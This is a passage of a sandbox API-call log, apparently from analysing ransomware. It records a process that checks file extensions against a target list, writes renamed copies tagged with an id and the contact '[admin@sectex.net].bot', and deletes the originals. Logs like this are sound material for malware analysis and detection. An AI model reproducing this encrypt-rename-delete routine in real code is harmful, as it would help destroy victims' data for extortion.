	[0147.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.262] lstrlenW (lpString=".dbf") returned 4
	[0147.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.262] lstrlenW (lpString=".1cd") returned 4
	[0147.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63
	[0147.262] lstrlenW (lpString=".jpg") returned 4
	[0147.262] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.262] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.262] lstrlenW (lpString="FD02153_.WMF") returned 12
	[0147.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.262] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5392) returned 1
	[0147.262] CloseHandle (hObject=0x268) returned 1
	[0147.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf")) returned 0x20
	[0147.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.263] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.263] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.264] GetLastError () returned 0x0
	[0147.264] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1510, lpOverlapped=0x0) returned 1
	[0147.266] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1520, lpOverlapped=0x0) returned 1
	[0147.267] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.267] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.267] SetEndOfFile (hFile=0x384) returned 1
	[0147.267] CloseHandle (hObject=0x384) returned 1
	[0147.267] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.267] SetEndOfFile (hFile=0x268) returned 1
	[0147.269] CloseHandle (hObject=0x268) returned 1
	[0147.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.269] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf")) returned 1
	[0147.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.270] lstrlenW (lpString=".doc") returned 4
	[0147.270] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.270] lstrlenW (lpString=".docx") returned 5
	[0147.270] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.270] lstrlenW (lpString=".pdf") returned 4
	[0147.270] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.270] lstrlenW (lpString=".xls") returned 4
	[0147.270] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.270] lstrlenW (lpString=".xlsx") returned 5
	[0147.270] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.270] lstrlenW (lpString=".ppt") returned 4
	[0147.270] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.270] lstrlenW (lpString=".zip") returned 4
	[0147.270] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.270] lstrlenW (lpString=".rar") returned 4
	[0147.270] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.270] lstrlenW (lpString=".bz2") returned 4
	[0147.271] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.271] lstrlenW (lpString=".7z") returned 3
	[0147.271] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.271] lstrlenW (lpString=".dbf") returned 4
	[0147.271] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.271] lstrlenW (lpString=".1cd") returned 4
	[0147.271] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.271] lstrlenW (lpString=".jpg") returned 4
	[0147.271] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.314] lstrlenW (lpString=".doc") returned 4
	[0147.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.314] lstrlenW (lpString=".docx") returned 5
	[0147.314] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.314] lstrlenW (lpString=".pdf") returned 4
	[0147.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.314] lstrlenW (lpString=".xls") returned 4
	[0147.314] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.315] lstrlenW (lpString=".xlsx") returned 5
	[0147.315] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.315] lstrlenW (lpString=".ppt") returned 4
	[0147.315] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.315] lstrlenW (lpString=".zip") returned 4
	[0147.315] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.315] lstrlenW (lpString=".rar") returned 4
	[0147.315] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.315] lstrlenW (lpString=".bz2") returned 4
	[0147.315] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.315] lstrlenW (lpString=".7z") returned 3
	[0147.315] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.315] lstrlenW (lpString=".dbf") returned 4
	[0147.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.315] lstrlenW (lpString=".1cd") returned 4
	[0147.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63
	[0147.315] lstrlenW (lpString=".jpg") returned 4
	[0147.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.315] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.315] lstrlenW (lpString="FD02158_.WMF") returned 12
	[0147.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.316] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1648) returned 1
	[0147.316] CloseHandle (hObject=0x268) returned 1
	[0147.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf")) returned 0x20
	[0147.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.317] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.317] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.318] GetLastError () returned 0x0
	[0147.318] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x670, lpOverlapped=0x0) returned 1
	[0147.319] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x680, lpOverlapped=0x0) returned 1
	[0147.320] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.320] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.320] SetEndOfFile (hFile=0x384) returned 1
	[0147.321] CloseHandle (hObject=0x384) returned 1
	[0147.321] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.321] SetEndOfFile (hFile=0x268) returned 1
	[0147.325] CloseHandle (hObject=0x268) returned 1
	[0147.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.325] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf")) returned 1
	[0147.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.326] lstrlenW (lpString=".doc") returned 4
	[0147.326] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.326] lstrlenW (lpString=".docx") returned 5
	[0147.326] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.326] lstrlenW (lpString=".pdf") returned 4
	[0147.326] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.326] lstrlenW (lpString=".xls") returned 4
	[0147.326] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.326] lstrlenW (lpString=".xlsx") returned 5
	[0147.326] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.326] lstrlenW (lpString=".ppt") returned 4
	[0147.326] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.326] lstrlenW (lpString=".zip") returned 4
	[0147.326] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.326] lstrlenW (lpString=".rar") returned 4
	[0147.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.326] lstrlenW (lpString=".bz2") returned 4
	[0147.326] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.326] lstrlenW (lpString=".7z") returned 3
	[0147.326] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.327] lstrlenW (lpString=".dbf") returned 4
	[0147.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.327] lstrlenW (lpString=".1cd") returned 4
	[0147.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.327] lstrlenW (lpString=".jpg") returned 4
	[0147.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.327] lstrlenW (lpString=".doc") returned 4
	[0147.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString=".docx") returned 5
	[0147.327] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.327] lstrlenW (lpString=".pdf") returned 4
	[0147.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString=".xls") returned 4
	[0147.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.327] lstrlenW (lpString=".xlsx") returned 5
	[0147.327] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.327] lstrlenW (lpString=".ppt") returned 4
	[0147.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.327] lstrlenW (lpString=".zip") returned 4
	[0147.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.327] lstrlenW (lpString=".rar") returned 4
	[0147.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString=".bz2") returned 4
	[0147.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.327] lstrlenW (lpString=".7z") returned 3
	[0147.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.328] lstrlenW (lpString=".dbf") returned 4
	[0147.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.328] lstrlenW (lpString=".1cd") returned 4
	[0147.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63
	[0147.328] lstrlenW (lpString=".jpg") returned 4
	[0147.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.328] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.328] lstrlenW (lpString="FD02161_.WMF") returned 12
	[0147.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.329] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3128) returned 1
	[0147.329] CloseHandle (hObject=0x268) returned 1
	[0147.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf")) returned 0x20
	[0147.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.329] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.329] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.330] GetLastError () returned 0x0
	[0147.330] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xc38, lpOverlapped=0x0) returned 1
	[0147.437] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xc40, lpOverlapped=0x0) returned 1
	[0147.438] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.438] WriteFile (in: hFile=0x384, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.438] SetEndOfFile (hFile=0x384) returned 1
	[0147.438] CloseHandle (hObject=0x384) returned 1
	[0147.438] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.438] SetEndOfFile (hFile=0x268) returned 1
	[0147.440] CloseHandle (hObject=0x268) returned 1
	[0147.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf")) returned 1
	[0147.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.540] lstrlenW (lpString=".doc") returned 4
	[0147.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.540] lstrlenW (lpString=".docx") returned 5
	[0147.540] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.540] lstrlenW (lpString=".pdf") returned 4
	[0147.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.540] lstrlenW (lpString=".xls") returned 4
	[0147.540] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.541] lstrlenW (lpString=".xlsx") returned 5
	[0147.541] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.541] lstrlenW (lpString=".ppt") returned 4
	[0147.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.541] lstrlenW (lpString=".zip") returned 4
	[0147.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.541] lstrlenW (lpString=".rar") returned 4
	[0147.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString=".bz2") returned 4
	[0147.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString=".7z") returned 3
	[0147.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.541] lstrlenW (lpString=".dbf") returned 4
	[0147.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.541] lstrlenW (lpString=".1cd") returned 4
	[0147.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.541] lstrlenW (lpString=".jpg") returned 4
	[0147.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.541] lstrlenW (lpString=".doc") returned 4
	[0147.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString=".docx") returned 5
	[0147.541] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.541] lstrlenW (lpString=".pdf") returned 4
	[0147.541] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.541] lstrlenW (lpString=".xls") returned 4
	[0147.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.542] lstrlenW (lpString=".xlsx") returned 5
	[0147.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.542] lstrlenW (lpString=".ppt") returned 4
	[0147.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.542] lstrlenW (lpString=".zip") returned 4
	[0147.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.542] lstrlenW (lpString=".rar") returned 4
	[0147.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.542] lstrlenW (lpString=".bz2") returned 4
	[0147.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.542] lstrlenW (lpString=".7z") returned 3
	[0147.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.542] lstrlenW (lpString=".dbf") returned 4
	[0147.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.542] lstrlenW (lpString=".1cd") returned 4
